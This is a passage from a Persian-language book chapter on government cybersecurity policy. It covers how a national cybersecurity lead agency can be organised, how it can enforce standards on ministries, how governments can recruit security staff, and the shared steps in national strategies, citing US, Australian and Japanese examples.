ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺍﺳﺖ ﻣﻲﺑﺎﺷﺪ ،ﺷﺎﻳﺪ ﺑﻬﺘﺮ ﺑﺎﺷﺪ ﺭﻫﺒﺮﻱ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ
ﺩﺭ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺍﻗﺘﺼﺎﺩﻱ ﻳﺎ ﺷﺮﻛﺖ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺩﻭﻟـﺖ ﻭ ﺗﺤـﺖ
ﻧﻈﺎﺭﺕ ﺑﺎﻻﺗﺮﻳﻦ ﻣﻘﺎﻡ ﺍﺟﺮﺍﻳﻲ ﻛﺸﻮﺭ ﻗﺮﺍﺭ ﮔﻴﺮﺩ.
ﺍﻣﺎ ﻣﻬﻤﺘﺮ ﺍﺯ ﺍﻳﻨﻜﻪ ﻛﺪﺍﻡ ﺳﺎﺯﻣﺎﻥ ﻳـﺎ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑﺎﻳـﺪ ﻣـﺴﺌﻮﻟﻴﺖ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺭﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﻧﺪ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﺑﺎﻳـﺪ ﻧـﻮﻋﻲ
"ﻓﺮﻣﺎﻧﺪﻫﻲ ﻣﻠﻲ" ﺍﻳﺠﺎﺩ ﺷﻮﺩ ﺗﺎ ﺑﺘﻮﺍﻥ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﻛـﺮﺩ ﻛـﻪ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺯ ﺳﻮﻱ ﺍﺟﺰﺍﻱ ﺩﻭﻟﺖ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ ﻛـﺎﻓﻲ ﻣـﻮﺭﺩ
ﺗﻮﺟﻪ ﻗﺮﺍﺭ ﺧﻮﺍﻫـﺪ ﮔﺮﻓـﺖ .ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺑـﻪ ﻭﺍﺭﺩ ﻛـﺮﺩﻥ ﻣﻘﻮﻟـﺔ
۲۶
۲۷
ﻃﺒﻖ ﻗﻮﺍﻧﻴﻦ ﺍﺳﺘﺮﺍﻟﻴﺎ ،ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺍﺟﺮﺍﻳـﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﻏﻴـﺮ ﺟﺰﺍﻳـﻲ
ﻫﺴﺘﻨﺪ ﻭ ﻫﻨﮕﺎﻣﻲ ﻛﻪ ﻛﺎﺭ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺣﻴﻄﻪ ﻛﻞ ﺩﻭﻟﺖ ﺑﺎﺷﺪ ﻭ ﻛﻤـﻲ
ﺍﺯ ﺳﺎﺧﺘﺎﺭ ﺩﻭﻟﺘﻲ ﻣﺴﺘﻘﻞ ﺑﺎﺷﻨﺪ ،ﺑﺎﻳـﺪ ﺗﻮﺳـﻂ ﺑـﺎﻻﺗﺮﻳﻦ ﻣﻘـﺎﻡ ﺩﻭﻟﺘـﻲ
ﻣﺤﻠﻲ ﺗﺄﺳﻴﺲ ﺷﻮﻧﺪ .ﺭﺋﻴﺲ ﺳﺎﺯﻣﺎﻥ ﺍﺟﺮﺍﻳﻲ ﺗﻮﺳﻂ ﻳـﻚ ﻭﺯﻳـﺮ -ﺩﺭ
ﺍﻳﻨﺠﺎ ﻭﺯﻳﺮ ﺍﺭﺗﺒﺎﻃﺎﺕ ﻭ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ -ﻣﻨﺼﻮﺏ ﻣﻲﺷـﻮﺩ ﻭ ﺗﻨﻬـﺎ
ﺑﻪ ﺍﻭ ﭘﺎﺳﺨﮕﻮﺳﺖ.
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ:
http://www.kantei.go.jp/foreign/it/security/2000
/0519taisei.html
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫﺎﻱ ﻣﻮﺟﻮﺩ ﻣﻲ ﺍﻧﺪﻳﺸﻴﻢ ،ﺳﺆﺍﻻﺕ
ﺳﺎﺯﻣﺎﻧﻲ ﻣﻬﻤﻲ ﭘﻴﺶ ﻣﻲﺁﻳﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﺮﺍﻱ ﺁﻧﻬﺎ ﭘﺎﺳﺦ ﻣﻨﺎﺳـﺐ
ﭘﻴﺪﺍ ﻛﺮﺩ .ﭼﻨﺎﻧﭽﻪ ﺗﻨﻬﺎ ﺍﺧﺘﻴـﺎﺭ ﺳـﺎﺯﻣﺎﻥ ﻫـﺪﺍﻳﺖﻛﻨﻨـﺪﺓ ﺍﻣﻨﻴـﺖ
ﺳﺎﻳﺒﺮ ،ﺗﺮﻏﻴﺐ ﻣﺮﺩﻡ ﻭ ﺍﻧﺘﺸﺎﺭ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ ﻋﻤـﻮﻡ ﺑﺎﺷـﺪ،
ﺍﺧﺘﻴﺎﺭ ﻋﻤﻠﻲ ﺁﻥ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺮ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪﻫـﺎ ﻣﺤـﺪﻭﺩ
ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﺎﻳﺪ ﺭﻭﺷﻬﺎﻳﻲ ﺑﻮﺟﻮﺩ ﺁﻳﻨﺪ ﻛﻪ ﺑـﻪ ﺭﻫﺒـﺮﺍﻥ
ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺍﺟـﺎﺯﻩ ﺩﻫﻨـﺪ ﺍﻣﻨﻴـﺖ ﺭﺍ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﻣﻮﺟـﻮﺩ
ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻭﺯﺍﺭﺗﺨﺎﻧﻪ ﻫﺎ ﺑﺮﻗﺮﺍﺭ ﺳﺎﺯﻧﺪ .ﻳـﻚ ﺭﻭﺵ ﺑـﺮﺍﻱ ﺍﻟـﺰﺍﻡ
ﻭﺯﺍﺭﺗﺨﺎﻧﻪﻫﺎ ﺑـﻪ ﻣﻮﺍﻓﻘـﺖ ﺑـﺎ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ
ﻣﻲﺗﻮﺍﻧﺪ ﺍﻳﻦ ﺑﺎﺷﺪ ﻛـﻪ ﻳـﻚ ﻣﻘـﺎﻡ ﻣـﺴﺌﻮﻝ ﺩﺭ ﺍﺩﺍﺭﺓ ﻣﺮﻛـﺰﻱ
ﺍﻣﻨﻴﺖ ﺩﺭ ﺩﻭﻟﺖ ﺑﺘﻮﺍﻧﺪ ﺳﻔﺎﺭﺷﺎﺕ ﺧﺮﻳﺪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺍﺯ
ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺒﻌﻴﺖ ﻧﻜﺮﺩﻩﺍﻧﺪ ﺭﺍ ﺭﺩ ﻛﻨﺪ.
ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺗﺎ ﺣﺪﻱ ﺍﻳـﻦ ﺭﻭﺵ ﺭﺍ ﺩﺭ ﭘـﻴﺶ ﮔﺮﻓﺘـﻪ ﻭ ﺣـﻖ
ﺗﺄﻳﻴــﺪ ﻳــﺎ ﺭﺩ ﻫﺰﻳﻨــﻪﻫــﺎﻱ ﺳــﺮﻣﺎﻳﻪﮔــﺬﺍﺭﻱ ﺭﻭﻱ ﺳﻴــﺴﺘﻤﻬﺎﻱ
ﺭﺍﻳﺎﻧﻪﺍﻱ -ﺑﺎ ﻣﻼﺣﻈﺎﺕ ﻣﺨﺘﻠﻒ ﺍﺯ ﺟﻤﻠﻪ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ -ﺭﺍ
ﺑﺮ ﻋﻬـﺪﺓ ﺩﻓﺘـﺮ ﻣـﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟـﻪﺑﻨـﺪﻱ ﺭﻳﺎﺳـﺖ ﺟﻤﻬـﻮﺭﻱ
ﮔﺬﺍﺷﺘﻪ ﺍﺳﺖ .ﻳﻚ ﺍﻗﺪﺍﻡ ﺩﻳﮕﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺍﻟـﺰﺍﻡ ﻭﺯﺍﺭﺗﺨﺎﻧـﻪ ﻫـﺎ ﻭ
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺑﻪ ﺍﺟﺮﺍﻱ ﻣﻤﻴـﺰﻱ ﺳـﺎﻻﻧﺔ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ ﻭ
ﮔﺰﺍﺭﺵ ﻧﺘﺎﻳﺞ ﺁﻥ ﺑﻪ ﺍﺩﺍﺭﺓ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺎﺷﺪ .ﻫﺮ ﺳﺎﺧﺘﺎﺭﻱ ﻛـﻪ
ﺍﻧﺘﺨـﺎﺏ ﺷـﻮﺩ ،ﻣـﺪﻳﺮ ﺍﺭﺷـﺪ ﺁﻥ ﺑﺎﻳـﺪ ﺍﺯ ﻃـﺮﻑ ﺩﻓﺘـﺮ ﺭﻳﺎﺳـﺖ
ﺟﻤﻬﻮﺭﻱ ﻳﺎ ﻧﺨﺴﺖ ﻭﺯﻳﺮﻱ ﺗﻌﻴـﻴﻦ ﮔـﺮﺩﺩ ﺗـﺎ ﺗﻤـﺎﻣﻲ ﺍﺩﺍﺭﺍﺕ ﻭ
ﺳﺎﺯﻣﺎﻧﻬﺎ ﺁﻧﺮﺍ ﺟﺪﻱ ﺑﮕﻴﺮﻧﺪ.
ﭼﺎﻟﺶ ﺳﺎﺯﻣﺎﻧﻲ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺩﻭﻟﺖ ،ﻣﺸﻜﻞ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ ﺍﺳـﺖ.
ﺩﻭﻟﺘﻬﺎ ﺑﺮﺍﻱ ﺟﺬﺏ ﻭ ﻧﮕﻬـﺪﺍﺭﻱ ﭘﺮﺳـﻨﻞ ﻣﺘﺨـﺼﺺ ﺩﺭ ﺯﻣﻴﻨـﺔ
ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﺸﻜﻞ ﺩﺍﺭﻧﺪ .ﻳﻜﻲ ﺍﺯ ﺭﺍﻩﺣﻠﻬﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﺭﺍﺋـﻪ
ﺑﻮﺭﺱ ﺗﺤﺼﻴﻠﻲ ﺑﺮﺍﻱ ﻣﻄﺎﻟﻌﺎﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑﺎﺷـﺪ ﻛـﻪ ﺑـﺎ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺑﻮﺭﺳﻬﺎ ،ﺍﻓﺮﺍﺩ ﺑـﺮﺍﻱ ﺳـﺎﻟﻬﺎﻱ ﻣﺸﺨـﺼﻲ ﺗﻌﻬـﺪ
ﺧﺪﻣﺖ ﺑﻪ ﺩﻭﻟﺖ ﭘﻴﺪﺍ ﺧﻮﺍﻫﻨﺪ ﻛﺮﺩ .ﻳﻚ ﺭﺍﻩﺣﻞ ﻛﻮﺗﺎﻩﻣﺪﺕ ﻧﻴـﺰ
ﻣﻲﺗﻮﺍﻧﺪ ﺍﺟﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﺍﻱ ﺩﻭ ﻣﺮﺣﻠـﻪﺍﻱ ﺑـﺎ ﻣـﺸﺎﺭﻛﺖ ﺑﺨـﺶ
ﺧﺼﻮﺻﻲ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺑﺮﺍﻱ ﺩﻭﻟﺖ
ﻛﺎﺭ ﻛﻨﻨﺪ ،ﺍﻣﺎ ﺗﻤﺎﻡ ﻳﺎ ﺑﺨـﺸﻲ ﺍﺯ ﺣﻘﻮﻗـﺸﺎﻥ ﺗﻮﺳـﻂ ﻛﺎﺭﻓﺮﻣـﺎﻱ
ﻲ ﺁﻧﻬﺎ ﭘﺮﺩﺍﺧﺖ ﮔﺮﺩﺩ .ﻣﺸﻜﻞ ﻣﻨـﺎﺑﻊ ﺍﻧـﺴﺎﻧﻲ ﺩﺭ
ﺑﺨﺶ ﺧﺼﻮﺻ ﹺ
ﺍﻣﻨﻴــﺖ ﺳــﺎﻳﺒﺮ ﻫــﻢ ﺩﺭ ﻛــﺸﻮﺭﻫﺎﻱ ﺗﻮﺳــﻌﻪﻳﺎﻓﺘــﻪ ﻭ ﻫــﻢ ﺩﺭ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﻨﺠﺮ ﺑﻪ ﻣﻮﺍﺟﻬﺔ ﺩﻭﻟـﺖ
ﺑﺎ ﻣﺸﻜﻞ ﺍﺳﺎﺳﻲ ﺩﻳﮕﺮﻱ ﺷﻮﺩ ،ﭼﺮﺍﻛـﻪ ﺩﻭﻟـﺖ ﺩﺭ ﻣﻘﺎﻳـﺴﻪ ﺑـﺎ
ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻣﺘﺨﺼﺼﻴﻦ ﺍﻳﻦ ﺭﺷـﺘﻪ ﺩﺳـﺘﻤﺰﺩ
ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﭙﺮﺩﺍﺯﺩ.
٢٣٧
ﺑﺨﺶ ﭼﻬﺎﺭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ
ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ
ﺭﻭﻧﺪ ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﻣﻲﺗﻮﺍﻧـﺪ ﺍﺑـﺰﺍﺭ ﻣـﺆﺛﺮﻱ
ﺑﺎﺷﺪ ﺑﺮﺍﻱ ﺗﺼﻤﻴﻤﮕﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﺍﻳﻨﻜﻪ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣـﺎﻟﻲ
ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﻣﻠـﻲ ﭼﻴـﺴﺘﻨﺪ ،ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺩﻭﻟـﺖ ﺑﺎﻳـﺪ ﭼـﻪ
ﭼﻴﺰﻫﺎﻳﻲ ﺑﺎﺷﺪ ،ﻭ ﭼﻪ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺍﺻـﻼﺣﺎﺗﻲ ﺩﺭ ﻗﺎﻧﻮﻧﮕـﺬﺍﺭﻱ
ﺑﺎﻳﺪ ﺩﻧﺒﺎﻝ ﺷﻮﺩ .ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ
ﺩﻭﻟﺖ ﻭ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺭﺍ ﻣﺸﺨﺺ ﺳﺎﺯﻧﺪ .ﺩﺭ ﺍﻳﻨﺠـﺎ ﻋﻤـﺪﺗﹰﺎ
ﺭﻭﻱ ﺁﻧﺪﺳﺘﻪ ﺍﺯ ﻋﻨﺎﺻﺮ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻣﻨﻴﺖ ﻣﻠﻲ ﺳﺎﻳﺒﺮ ﻣﺘﻤﺮﻛﺰ
ﻣﻲﺷﻮﻳﻢ ﻛﻪ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻭﻟﺘﻲ ﺭﺍ ﺑﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﻧـﺪ.
ﺩﺭ ﺍﺩﺍﻣــﺔ ﺑﺨــﺶ ﭼﻬــﺎﺭﻡ ﻧﻘــﺶ ﺩﻭﻟــﺖ ﺭﺍ ﺩﺭ ﺍﺭﺗﻘــﺎﻱ ﺍﻣﻨﻴــﺖ
ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺑﺨــﺶ ﺧــﺼﻮﺻﻲ ﻣــﻮﺭﺩ ﺑﺤــﺚ ﻭ ﺑﺮﺭﺳــﻲ ﻗــﺮﺍﺭ
ﺧﻮﺍﻫﻴﻢ ﺩﺍﺩ .ﻣﺮﻭﺭ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﻲﺗﻮﺍﻧـﺪ ﻓﻮﺍﻳـﺪ
ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺭﻭﺷﻦ ﻛﻨﺪ:
ﺗﺎ ﺑﻪ ﺍﻣﺮﻭﺯ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭﺳـﻴﻌﺘﺮﻳﻦ ﻭ ﺑﻴـﺸﺘﺮﻳﻦ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ
ﺗﻬﻴﺔ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ ﺍﻣﻨﻴﺖ ﺳـﺎﻳﺒﺮ ﺭﺍ ﺩﺍﺷـﺘﻪ ﻭ ﺩﺭ ﻋﻤﻠﻜـﺮﺩ
ﺳﺎﻳﺮ ﻛﺸﻮﺭﻫﺎ ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻧﻴﺰ ﻣﻄﺎﻟﺐ ﻭ ﻣﻮﺿـﻮﻋﺎﺕ
ﻣﺸﺎﺑﻬﻲ ﺑﻪ ﭼﺸﻢ ﻣﻲﺧﻮﺭﺩ .ﺑﺎ ﺍﻳﻨﻜﻪ ﺟﺰﺋﻴـﺎﺕ ﺍﻳـﻦ ﻓﺮﺁﻳﻨـﺪﻫﺎ ﻭ
ﭘﻴﺎﻣﺪﻫﺎﻱ ﻗﻮﺍﻧﻴﻦ ﻭ ﺳﺎﺧﺘﺎﺭﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﺍﺯ ﻛﺸﻮﺭﻱ ﺑﻪ ﻛـﺸﻮﺭ
ﺩﻳﮕﺮ ﻣﺘﻔﺎﻭﺕ ﻫﺴﺘﻨﺪ ،ﻓﺮﺁﻳﻨـﺪ ﺗﻬﻴـﺔ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﺍﻣﻨﻴـﺖ ﺳـﺎﻳﺒﺮ
ﻣــﺸﺎﺑﻪ ﺭﻭﺷــﻲ ﺍﺳــﺖ ﻛــﻪ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻛــﺸﻮﺭﻫﺎ ﺑــﺮﺍﻱ ﺗﻬﻴــﻪ
The National Strategy to Secure Cyberspace
][U.S.
http://www.whitehouse.gov/pcipb
http://www.dhs.gov/interweb/assetlibrary/Natio
nal_Cyberspace_Strategy.pdf
28
ﺑﺮ ﺍﺳﺎﺱ ﺗﺠﺮﺑﻴﺎﺕ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺧﻮﺩ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﻣﻠﻲ
ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ ،ﺩﺭ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑﺮﺧـﻲ ﻋﻨﺎﺻـﺮ ﻭ
ﺑﺨﺸﻬﺎﻱ ﻣﺸﺘﺮﻙ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
.۱
ﺍﺭﺯﻳــﺎﺑﻲ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻳﻬﺎﻱ ﻣﻠــﻲ ﻭ ﺍﻧﺘــﺸﺎﺭ ﮔﺰﺍﺭﺷــﻬﺎﻱ
ﻋﻤﻮﻣﻲ ﻛﻪ ﻛﻠﻴﺖ ﻣﻮﺿﻮﻉ ﺭﺍ ﺑﻪ ﺗﺼﻮﻳﺮ ﻣﻲﻛﺸﻨﺪ ﻭ ﺑﺮﺍﻱ
ﺳﻴﺎﺳﺘﮕﺬﺍﺭﺍﻥ ﻭ ﻣﺮﺩﻡ ﺁﮔﺎﻫﻲ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ؛
.۲
ﺍﻳﺠﺎﺩ ﺳﺎﺧﺘﺎﺭ ﻓﺮﻣﺎﻧﺪﻫﻲ ﺩﺭ ﺑﺨﺶ ﺍﺟﺮﺍﻳﻲ ﺩﻭﻟـﺖ ﺑـﺮﺍﻱ
ﻧﻈﺎﺭﺕ ﺑﺮ ﺗﻬﻴﻪ ﻭ ﺍﺟﺮﺍﻱ ﺳﻴﺎﺳﺘﻬﺎ؛
.۳
ﺗﻬﻴﺔ ﻳﻚ ﻃﺮﺡ ﺗﻔﺼﻴﻠﻲ ﻣﻠﻲ ﺑـﺎ ﺗﺒـﺎﺩﻝ ﻧﻈـﺮ ﺑـﺎ ﺑﺨـﺶ
ﺧﺼﻮﺻﻲ؛
.۴
ﺗﻄﺒﻴﻖ ﻣﻘﺮﺭﺍﺕ ﻭ ﺭﺍﻫﺒﺮﺩﻫﺎﻱ ﻣـﺮﺗﺒﻂ ﺑـﺎ ﻣـﺴﺎﺋﻠﻲ ﻧﻈﻴـﺮ
ﺍﺷﺘﺮﺍﻙ ﻭ ﺩﺳﺘﺮﺳﻲ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺑـﺮﺍﻱ ﺑﻮﺟـﻮﺩ ﺁﻭﺭﺩﻥ
ﭘﺎﺳﺨﮕﻮﻳﻲ.
ﻓﺎﺯ ﺍﻭﻝ ،ﺍﺭﺯﻳﺎﺑﻲ ﻣﻔﺼﻞ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎ ﻭ ﺍﻓﺰﺍﻳﺶ ﺳﻄﺢ ﺁﮔـﺎﻫﻲ
ﺍﺳﺖ .ﺑﻌﻨﻮﺍﻥ ﻣﺜـﺎﻝ ﺍﺳـﺘﺮﺍﻟﻴﺎ ﺩﺭ ﺳـﺎﻝ ۱۹۹۷ﮔﺰﺍﺭﺷـﻲ ﺗﺤـﺖ
ﻋﻨــﻮﺍﻥ ﺯﻳﺮﺳــﺎﺧﺖ ﺍﻃﻼﻋــﺎﺕ ﻣﻠــﻲ ﺍﺳــﺘﺮﺍﻟﻴﺎ :ﺗﻬﺪﻳــﺪﻫﺎ ﻭ
ﺁﺳﻴﺐ ﭘﺬﻳﺮﻳﻬﺎ ٣١ﺑﻪ ﭼﺎﭖ ﺭﺳﺎﻧﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﮔﺰﺍﺭﺵ ﻛﻪ ﺗﻮﺳـﻂ
ﻫﻴــﺄﺕ ﻣــﺪﻳﺮﺓ ﺷــﺮﻛﺖ Defense Signalsﺗﻨﻈــﻴﻢ ﺷــﺪ
ﺧﻮﺍﻧﻨﺪﻩ ﺭﺍ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﻣﻲﺭﺳﺎﻧﺪ ﻛﻪ ﺟﺎﻣﻌﺔ ﺍﺳﺘﺮﺍﻟﻴﺎ ﻧﺴﺒﺖ ﺑﻪ
ﻧﻘﺎﺋﺺ ﻧﺴﺒﺘﹰﺎ ﺯﻳﺎﺩ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺍﺳـﺖ ﻭ ﻧﻴـﺰ
ﻫﻴﭻ ﺳﺎﺧﺘﺎﺭ ﺭﺳﻤﻲ ﻭ ﻣﺸﺨـﺼﻲ ﺑـﺮﺍﻱ ﻫﻤـﺎﻫﻨﮕﻲ ﻭ ﺍﺟـﺮﺍﻱ
ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺟﻬـﺖ ﺣﻔـﻆ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺍﺳﺎﺳـﻲ ﻭﺟـﻮﺩ
۲۹
ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻭﺭﻗﻲ ﺷﻤﺎﺭﻩ ۱۷ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ.
http://www.kantei.go.jp/foreign/it/network/
priority-all/index.html
Australia's National Information Infrastructure:
Threats & Vulnerabilities
30
31
ﺑﺨﺶ ﭼﻬﺎﺭﻡ
ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﻭﺍﻛﻨﺶ ﺑﻪ ﺗﻬﺪﻳﺪﻫﺎﻱ ﺩﺭﺣﺎﻝ
ﺭﺷﺪ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﺁﻣﺎﺩﮔﻲ ﻻﺯﻡ ﺭﺍ ﺩﺍﺭﺩ .ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺩﺭ ﺑﻌﻀﻲ
ﻣـــﻮﺍﺭﺩ ﺧـــﺎﺹ ،ﭘﺎﺳـــﺦ ﺩﻭﻟـــﺖ ﻣﺮﻛـــﺰﻱ ﻣﻨﺎﺳـــﺒﺘﺮ ﻭ
ﻗﺎﺑﻞ ﻗﺒﻮﻝﺗﺮ ﻣﻲﺑﺎﺷﺪ .ﺍﺯ ﻧﻈﺮ ﺩﺍﺧﻠﻲ ،ﺗـﺪﺍﻭﻡ ﺍﻳﻨﻜـﺎﺭ ﺩﺭ ﺩﻭﻟـﺖ
ﻧﻴﺎﺯﻣﻨﺪ ﻛﺴﺐ ﺍﻃﻤﻴﻨـﺎﻥ ﺍﺯ ﺍﻣﻨﻴـﺖ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺳـﺎﻳﺒﺮ ﺧـﻮﺩ
ﺩﻭﻟﺖ ﻭ ﺳﺮﻣﺎﻳﻪﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﻣﺄﻣﻮﺭﻳﺘﻬـﺎ ﻭ
ﺧﺪﻣﺎﺕ ﺿﺮﻭﺭﻱ ﺁﻥ ﺍﺳـﺖ .ﺍﺯ ﻧﻈـﺮ ﺧـﺎﺭﺟﻲ ،ﺩﺭ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ
ﻫﺰﻳﻨﻪﻫﺎﻱ ﺑﺎﻻﻱ ﺗﺒﺎﺩﻻﺕ ﻭ ﻣﻮﺍﻧـﻊ ﻗـﺎﻧﻮﻧﻲ ﻣﻨﺠـﺮ ﺑـﻪ ﻭﻗـﻮﻉ
ﻣﺸﻜﻼﺕ ﺑﺰﺭﮒ ﺩﺭ ﻫﻤﻜﺎﺭﻳﻬﺎ ﻣﻲﺷﻮﻧﺪ؛ ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﺩﻭﻟـﺖ
ﺩﺭ ﻏﻴﺎﺏ ﻧﻴﺮﻭﻫﺎﻱ ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ؛ ﻭ ﻫﻨﮕﺎﻣﻴﻜـﻪ
